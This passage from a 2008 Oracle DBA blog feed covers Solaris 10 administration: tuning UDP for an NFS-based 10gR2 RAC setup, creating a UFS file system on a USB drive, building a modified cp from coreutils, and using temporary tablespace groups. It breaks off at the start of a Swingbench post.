The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are &lt;code&gt;udp_recv_hiwat&lt;/code&gt; and &lt;code&gt;udp_xmit_hiwat&lt;/code&gt;. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.
&lt;br&gt;

To see what these parameters are currently set to, perform the following:

&lt;pre&gt;
# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344
&lt;/pre&gt;
&lt;br&gt;
To set the values of these parameters to 65536 bytes in current memory, perform the following:

&lt;pre&gt;
# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536
&lt;/pre&gt;
&lt;br&gt;
Now we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that the parameters are set on boot when they are placed in the &lt;code&gt;/etc/system&lt;/code&gt; file. The values placed in &lt;code&gt;/etc/system&lt;/code&gt; will have no affect on Solaris 10. Bug 5237047 has more information on this.
&lt;br&gt;

So what we will do is to create a startup script called &lt;code&gt;udp_rac&lt;/code&gt; in &lt;code&gt;/etc/init.d&lt;/code&gt;. This script will have the following contents:

&lt;pre&gt;
#!/sbin/sh
case "$1" in
'start')
ndd -set /dev/udp udp_xmit_hiwat 65536
ndd -set /dev/udp udp_recv_hiwat 65536
;;
'state')
ndd /dev/udp udp_xmit_hiwat
ndd /dev/udp udp_recv_hiwat
;;
*)
echo "Usage: $0 { start | state }"
exit 1
;;
esac
&lt;/pre&gt;
&lt;br&gt;
Now, we need to create a link to this script in the &lt;code&gt;/etc/rc3.d&lt;/code&gt; directory:

&lt;pre&gt;
# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac
&lt;/pre&gt;
&lt;br&gt;
&lt;h2&gt;Configuring the NFS Filer&lt;/h2&gt;

Now that we have Solaris installed on all our machines, its time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive you can ignore the next paragraph.
&lt;br&gt;

In my &lt;a
href="http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10.html"&gt;previous post&lt;/a&gt;, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to be following that post exactly. So if you perform what I mention in that post, you will have a UFS file system ready for mounting.
&lt;br&gt;

Now, I have a UFS file system created on the &lt;code&gt;/dev/dsk/c2t0d0s0&lt;/code&gt; device. I will create a directory for mounting this file system and then mount it:

&lt;pre&gt;
# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac
&lt;/pre&gt;
&lt;br&gt;
Now that we have created the base directory, lets create directories inside this which will contain the various files for our RAC environment.

&lt;pre&gt;
# cd /export/rac
# mkdir crs_files
# mkdir oradata
&lt;/pre&gt;
&lt;br&gt;
The &lt;code&gt;/export/rac/crs_files&lt;/code&gt; directory will contain the OCR and the voting disk files used by Oracle Clusterware. The &lt;code&gt;/export/rac/oradata&lt;/code&gt; directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.
&lt;br&gt;

Obviously, this setup is not ideal since everything is on the same device. For setting up this environment, I didn't care. All I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step but I'm lazy...
&lt;br&gt;

Now we need to make these directories accessible to the Oracle RAC nodes. I will be accomplishing this using NFS. We first need to edit the &lt;code&gt;/etc/dfs/dfstab&lt;/code&gt; file to specify which directories we want to share and what options we want to use when sharing them. The &lt;code&gt;dfstab&lt;/code&gt; file I configured looked like so:

&lt;pre&gt;
#       Place share(1M) commands here for automatic execution
#       on entering init state 3.
#
#       Issue the command 'svcadm enable network/nfs/server' to
#       run the NFS daemon processes and the share commands, after adding
#       the very first entry to this file.
#
#       share [-F fstype] [ -o options] [-d ""]  [resource]
#       .e.g,
#       share  -F nfs  -o rw=engineering  -d "home dirs"  /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata
&lt;/pre&gt;
&lt;br&gt;
The &lt;code&gt;anon&lt;/code&gt; option in the &lt;code&gt;dfstab&lt;/code&gt; file as shown above, is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.
&lt;br&gt;

After editing the &lt;code&gt;dfstab&lt;/code&gt; file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:

&lt;pre&gt;
# svcadm restart nfs/server
&lt;/pre&gt;

To check if the directories are exported correctly, the following can be performed from the NFS filer:

&lt;pre&gt;
# share
-               /export/rac/crs_files   rw,anon=175   ""
-               /export/rac/oradata     rw,anon=175   ""
#
&lt;/pre&gt;

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (&lt;code&gt;solaris1&lt;/code&gt; and &lt;code&gt;solaris2&lt;/code&gt; in my case):

&lt;pre&gt;
# dfshares solaris-filer
RESOURCE                                  SERVER ACCESS    TRANSPORT
solaris-filer:/export/rac/crs_files    solaris-filer  -         -
solaris-filer:/export/rac/oradata      solaris-filer  -         -
#
&lt;/pre&gt;
&lt;br&gt;
The output should be the same on both nodes.

&lt;h2&gt;Configure NFS Exports on Oracle RAC Nodes&lt;/h2&gt;

Now we need to configure the NFS exports on the two nodes in the cluster. First, we must create directories where we will be mounting the exports. In my case, I did this:

&lt;pre&gt;
# mkdir /u02
# mkdir /u03
&lt;/pre&gt;
&lt;br&gt;
I am not using &lt;code&gt;u01&lt;/code&gt; as I'm using this directory for installing the software. I will not be configuring a shared Oracle home in this article as I wanted to keep things as simple as possible but that might serve as a good future blog post.
&lt;br&gt;

For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The mount command which I used to manually mount these exports is as follows:

&lt;pre&gt;
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03
&lt;/pre&gt;
&lt;br&gt;
Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the &lt;code&gt;/etc/vfstab&lt;/code&gt; file. The extra lines which I added to the &lt;code&gt;/etc/vfstab&lt;/code&gt; file on both nodes were (the output below did not come out very well originally so I had to split each line into 2 lines):

&lt;pre&gt;
solaris-filer:/export/rac/crs_files   -   /u02   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata     -   /u03   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
&lt;/pre&gt;
&lt;br&gt;
&lt;h2&gt;Configure the Solaris Servers for Oracle&lt;/h2&gt;

Now that we have shared storage setup, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and configuration assistants (such as NETCA) will look for the SSH binaries in the wrong location on Solaris. Even if the SSH binaries are included in your path when you start these programs, they will still look for the binaries in the wrong location. On Solaris, the SSH binaries are located in the &lt;code&gt;/usr/bin&lt;/code&gt; directory by default. The OUI will throw an error stating that it cannot find the &lt;code&gt;ssh&lt;/code&gt; or &lt;code&gt;scp&lt;/code&gt; binaries. My simple workaround was to simply create a symbolic link in the &lt;code&gt;/usr/local/bin&lt;/code&gt; directory for these binaries.

&lt;pre&gt;
# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp
&lt;/pre&gt;
&lt;br&gt;
You should also create the oracle user and directories now before configuring kernel parameters.
&lt;br&gt;

For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to &lt;a href="http://www.dizwell.com/prod/node/235"&gt;this excellent installation guide&lt;/a&gt; for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

&lt;h2&gt;What's Left to Do&lt;/h2&gt;

From here on in, its quite easy to follow Jeff Hunter's &lt;a href="http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi.html"&gt;article&lt;/a&gt;. Obviously, you wont be using ASM. The only differences between what to do now and what he has documented is file locations. So you could follow along from &lt;a href="http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi_2.html#14"&gt;section 14&lt;/a&gt; and you should be able to get a 10gR2 RAC environment up and running. Obviously, there is some sections such as setting up OCFS2 and ASMLib that can be left out since we are installing on Solaris and not Linux.
</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/29/oracle-10gr2-rac-with-solaris-10-and-nfs.html</feedburner:origLink></entry>
 
 <entry>
   <title>Creating a UFS File System on an External Hard Drive with Solaris 10</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/-LKwmdI2C4Y/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10.html" />
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10</id>
   <content type="html">&lt;p&gt;Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files and I was going to use the drive exclusively with one of my Solaris systems. Now, I didn&amp;#8217;t find much information on the web about how to perform this with Solaris (maybe I wasn&amp;#8217;t searching very well or something) so I thought I would post the procedure I followed here so I&amp;#8217;ll know how to do it again if I need to.&lt;/p&gt;

&lt;p&gt;After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the &lt;code&gt;/var/adm/messages&lt;/code&gt; file. With the hard drive I was using, I saw entries like the following:&lt;/p&gt;
&lt;pre&gt;
Mar  2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) 
operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2usb0 at bus address 2
Mar  2 13:10:33 solaris-filer usba: [ID 349649 kern.info]       Maxtor OneTouch II L60LHYQG
Mar  2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar  2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 
(scsa2usb0) online
Mar  2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0
&lt;/pre&gt;
&lt;p&gt;The dmesg command could also be used to see similar information. Also, we could use the rmformat command (this lists removable media) to see this information in a much nicer format like so:&lt;/p&gt;
&lt;pre&gt;
# rmformat -l
Looking for devices...
   1. Logical Node: /dev/rdsk/c1t0d0p0
      Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
      Connected Device: QSI      CDRW/DVD SBW242U UD25
      Device Type: DVD Reader
   2. Logical Node: /dev/rdsk/c2t0d0p0
      Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
      Connected Device: Maxtor   OneTouch II      023g
      Device Type: Removable
#
&lt;/pre&gt;
&lt;p&gt;Now that we now the drive has been identified by Solaris (as &lt;code&gt;/dev/rdsk/c2t0d0p0&lt;/code&gt;) we need to create one Solaris partition (this is Solaris 10 running on the x86 architecture) that uses the whole disk. This accomplished by passing the &lt;code&gt;-B&lt;/code&gt; flag to the &lt;code&gt;fdisk&lt;/code&gt; command, like so:&lt;/p&gt;
&lt;pre&gt;
# fdisk -B /dev/rdsk/c2t0d0p0
&lt;/pre&gt;
&lt;p&gt;Now we will print the disk table to standard out like so:&lt;/p&gt;
&lt;pre&gt;
# fdisk -W - /dev/rdsk/c2t0d0p0
&lt;/pre&gt;
&lt;p&gt;This will output the following information to the screen for the hard drive I am using:&lt;/p&gt;
&lt;pre&gt;
* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
*    512 bytes/sector
*     63 sectors/track
*    255 tracks/cylinder
*   36483 cylinders
*
* systid:
*    1: DOSOS12
*    2: PCIXOS
*    4: DOSOS16
*    5: EXTDOS
*    6: DOSBIG
*    7: FDISK_IFS
*    8: FDISK_AIXBOOT
*    9: FDISK_AIXDATA
*   10: FDISK_0S2BOOT
*   11: FDISK_WINDOWS
*   12: FDISK_EXT_WIN
*   14: FDISK_FAT95
*   15: FDISK_EXTLBA
*   18: DIAGPART
*   65: FDISK_LINUX
*   82: FDISK_CPM
*   86: DOSDATA
*   98: OTHEROS
*   99: UNIXOS
*  101: FDISK_NOVELL3
*  119: FDISK_QNX4
*  120: FDISK_QNX42
*  121: FDISK_QNX43
*  130: SUNIXOS
*  131: FDISK_LINUXNAT
*  134: FDISK_NTFSVOL1
*  135: FDISK_NTFSVOL2
*  165: FDISK_BSD
*  167: FDISK_NEXTSTEP
*  183: FDISK_BSDIFS
*  184: FDISK_BSDISWAP
*  190: X86BOOT
*  191: SUNIXOS2
*  238: EFI_PMBR
*  239: EFI_FS
*

* Id    Act  Bhead  Bsect  Bcyl    Ehead  Esect  Ecyl    Rsect    Numsect
191   128  0      1      1       254    63     1023    16065    586083330
&lt;/pre&gt;
&lt;p&gt;We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sectors (512 in my case) by the number of sectors listed at the bottom of the output shown above. We then divide this number by 1024&lt;em&gt;1024 to yield MBs.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;So in my case, this will work out as 286173.5009765625 MB.&lt;/p&gt;

&lt;p&gt;Now, we need to setup a partition table file. This will be a regular text file and you can name it whatever you like. For the sake of this post, I will name it disk_slices.txt. The contents of this file are:&lt;/p&gt;
&lt;pre&gt;
slices: 0 = 2MB, 286170MB, "wm", "root" :
      1 = 0, 1MB, "wu", "boot" :
      2 = 0, 286172MB, "wm", "backup"
&lt;/pre&gt;
&lt;p&gt;To create these slices on the disk, we run:&lt;/p&gt;
&lt;pre&gt;
# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C
&lt;/pre&gt;
&lt;p&gt;To create the UFS file system on the newly created slice, I run the following and the output from running this command is also shown:&lt;/p&gt;
&lt;pre&gt;
# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0:     586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
      286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#
&lt;/pre&gt;
&lt;p&gt;And now I&amp;#8217;m finished, I now have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I can just:&lt;/p&gt;
&lt;pre&gt;
# mount -F ufs /dev/rdsk/c2t0d0p0 /u01
&lt;/pre&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10.html</feedburner:origLink></entry>
 
 <entry>
   <title>Building a Modified cp Binary on Solaris 10</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Qn2hhJiA61Q/building-a-modified-cp-binary-on-solaris-10.html" />
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/29/building-a-modified-cp-binary-on-solaris-10</id>
   <content type="html">&lt;p&gt;I thought I would write a post on how I setup my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10 in case anyone arrives here from Kevin Closson&amp;#8217;s blog. If you are looking for more background information on why I am performing this modification, have a look at &lt;a href='http://kevinclosson.wordpress.com/2007/02/23/standard-file-utilities-with-direct-io/'&gt;this post&lt;/a&gt; by Kevin Closson.&lt;/p&gt;
&lt;span style='bold;'&gt;GNU Core Utilities&lt;/span&gt;
&lt;p&gt;We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the &lt;a href='http://www.gnu.org/software/coreutils/'&gt;GNU Core Utilities&lt;/a&gt;. &lt;ul&gt;
	&lt;li&gt;&lt;a href='http://ftp.gnu.org/pub/gnu/coreutils/coreutils-5.2.1.tar.gz'&gt;Coreutils 5.2.1&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt; Down the software to an appropriate location on your system.&lt;/p&gt;
&lt;span style='bold;'&gt;Modifying the Code&lt;/span&gt;
&lt;p&gt;Untar the code first on your system.&lt;/p&gt;
&lt;pre&gt;
# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar
&lt;/pre&gt;
&lt;p&gt;Proceed to the &lt;code&gt;coreutils-5.2.1/src&lt;/code&gt; directory. Open the &lt;code&gt;copy.c&lt;/code&gt; file with an editor. The following are the differences between the modified &lt;code&gt;copy.c&lt;/code&gt; file and the original &lt;code&gt;copy.c&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;
# diff -b copy.c.orig copy.c
287c315
&amp;lt; buf_size =" ST_BLKSIZE"&amp;gt;   /* buf_size = ST_BLKSIZE (sb);*/

288a317,319
&amp;gt;
&amp;gt;      buf_size = 8388608 ;
&amp;gt;
&lt;/pre&gt;&lt;span style='bold;'&gt;Building the Binary&lt;/span&gt;
&lt;p&gt;To build the modified cp binary, navigate first to the &lt;code&gt;coreutils-5.2.1&lt;/code&gt; directory. Then enter the following (ensure that the &lt;code&gt;gcc&lt;/code&gt; binary is in your &lt;code&gt;PATH&lt;/code&gt; first; it is located at &lt;code&gt;/usr/sfw/bin/&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;
# ./configure
# /usr/ccs/bin/make
&lt;/pre&gt;
&lt;p&gt;We don&amp;#8217;t want to do &lt;code&gt;make install&lt;/code&gt; as is the usual when building something from source like this as it would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the &lt;code&gt;coreutils-5.2.1/src&lt;/code&gt; directory like so:&lt;/p&gt;
&lt;pre&gt;
# cp coreutils-5.2.1/src/cp /usr/bin/cp8m
&lt;/pre&gt;&lt;span style='bold;'&gt;Results of using the Modified cp&lt;/span&gt;
&lt;p&gt;See &lt;a href='http://kevinclosson.wordpress.com/2007/03/15/copying-files-on-solaris-slow-or-fast-its-your-choice/'&gt;Kevin Closson's post&lt;/a&gt; on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/29/building-a-modified-cp-binary-on-solaris-10.html</feedburner:origLink></entry>
 
 <entry>
   <title>White Paper at Oracle OpenWorld</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/SKoCPYNTgVI/white-paper-at-oracle-openworld.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/white-paper-at-oracle-openworld</id>
   <content type="html">&lt;p&gt;A white paper that I was part of writing is being presented at Oracle OpenWorld this week. The paper is entitled &amp;#8216;High Availability Options for the Oracle Database&amp;#8217;. It is being presented by Dan Norris and I wrote the sections on Export/Import and data pump. The paper is available for download from the IT Convergence website &lt;a href='http://www.itconvergence.com/portal/page?_pageid=33,39115&amp;amp;_dad=portal&amp;amp;_schema=PORTAL'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Dan is kinda like my mentor here at &lt;a href='http://www.itconvergence.com/'&gt;IT Convergence&lt;/a&gt;. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.&lt;/p&gt;

&lt;p&gt;At the moment, I&amp;#8217;ve been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed &lt;a href='http://www.oracle.com/technology/pub/articles/hunter_rac10gr2.html'&gt;this excellent article&lt;/a&gt; by Jeffrey Hunter on setting up a RAC environment with a budget!&lt;/p&gt;

&lt;p&gt;OCFS2 would not play nice for me though so I decided to use RAW devices instead of OCFS like Mr. Hunter did in his article. Besides that though, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle firewire modules!).&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/white-paper-at-oracle-openworld.html</feedburner:origLink></entry>
 
 <entry>
   <title>Temporary Tablespace Groups</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Bwn2I7bEqRI/temporary-tablespace-groups.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/temporary-tablespace-groups</id>
   <content type="html">&lt;p&gt;Temporary tablespace groups are a new feature introduced in Oracle10g. A temporary tablespace group is a list of tablespaces and is implicitly created when the first temporary tablespace is created. Its members can only be temporary tablespaces.&lt;/p&gt;

&lt;p&gt;You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused where one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Group Creation&lt;/span&gt;
&lt;p&gt;You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; CREATE TEMPORARY TABLESPACE temp_test_1&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp'&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 3 SIZE 100 M&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 4 TABLESPACE GROUP temp_group_1;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace created.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;If the group &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;temp_group_1&lt;/span&gt;&lt;/span&gt; did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; CREATE TEMPORARY TABLESPACE temp_test_2&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp'&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 3 SIZE 100 M&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 4 TABLESPACE GROUP '';&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace created.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;Now we will alter this tablespace and add it to a group.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; ALTER TABLESPACE temp_test_2&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TABLESPACE GROUP temp_group_1;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace altered.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;To de-assign a temporary tablespace from a group, we issue an &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;ALTER TABLESPACE&lt;/span&gt;&lt;/span&gt; command as so:&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; ALTER TABLESPACE temp_test_2&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TABLESPACE GROUP '';&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;Tablespace altered.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;&lt;span style='font-weight: bold;'&gt;Assign Users to Temporary Tablespace Groups&lt;/span&gt;
&lt;p&gt;In this example, we will assign the user &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SCOTT&lt;/span&gt;&lt;/span&gt; to the temporary tablespace group &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;temp_group_1&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; ALTER USER scott&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 TEMPORARY TABLESPACE temp_group_1;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;User altered.&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;
&lt;p&gt;Now when we query the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;DBA_USERS&lt;/span&gt;&lt;/span&gt; view to see &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SCOTT&lt;/span&gt;&lt;/span&gt;&amp;#8217;s default temporary tablespace, we will see that the group is his temporary tablespace now. &lt;span style='font-size:85%;'&gt;
&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; SELECT username, temporary_tablespace&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 2 FROM DBA_USERS&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; 3 WHERE username = 'SCOTT';&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;span style='font-family: courier new;'&gt;USERNAME TEMPORARY_TABLESPACE&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;-------- ------------------------------&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SCOTT    TEMP_GROUP_1&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;&lt;span style='font-weight: bold;'&gt;Data Dictionary Views&lt;/span&gt;
&lt;p&gt;To view a temporary tablespace group and it smembers we can view the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;DBA_TABLESPACE_GROUPS&lt;/span&gt;&lt;/span&gt; data dictionary view.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt; SELECT * FROM DBA_TABLESPACE_GROUPS;&lt;/span&gt;&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;GROUP_NAME   TABLESPACE_NAME&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;------------ ------------------------------&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;TEMP_GROUP_1 TEMP_TEST_1&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;TEMP_GROUP_1 TEMP_TEST_2&lt;/span&gt;&lt;span style='font-family: courier new;'&gt;SQL&amp;gt;&lt;/span&gt;&lt;span style='font-weight: bold;'&gt;Advantages of Temporary Tablespace Groups&lt;/span&gt;&lt;ul&gt;
	&lt;li&gt;Allows multiple default temporary tablespaces&lt;/li&gt;
	&lt;li&gt;A single SQL operation can use muultiple temporary tablespaces for sorting&lt;/li&gt;
	&lt;li&gt;Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.&lt;/li&gt;
	&lt;li&gt;If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.&lt;/li&gt;
&lt;/ul&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/temporary-tablespace-groups.html</feedburner:origLink></entry>
 
 <entry>
   <title>Playing with Swingbench</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/UEjECd2J3LY/playing-with-swingbench.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/playing-with-swingbench</id>
   <content type="html">&lt;a href='http://www.dominicgiles.com/swingbench.html'&gt;Swingbench&lt;/a&gt;&lt;span style='font-weight: bold;'&gt;A Note About the Environment Used for Testing&lt;/span&gt;
&lt;p&gt;Before we delve into using Swingbench, I thought I should mention a little about the environment used for testing as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1GB of RAM. It is running on Solaris 10, specifically the 11/06 release. The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.&lt;/p&gt;

&lt;p&gt;The datafiles for the database reside on a 80 GB partition which is formatted with a UFS filesystem and the redo logs reside on a 20 GB partition which is also formatted with a UFS filesystem. The database is not running in archive log mode and there is no flash recovery area configured.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Enabling Direct I/O&lt;/span&gt;
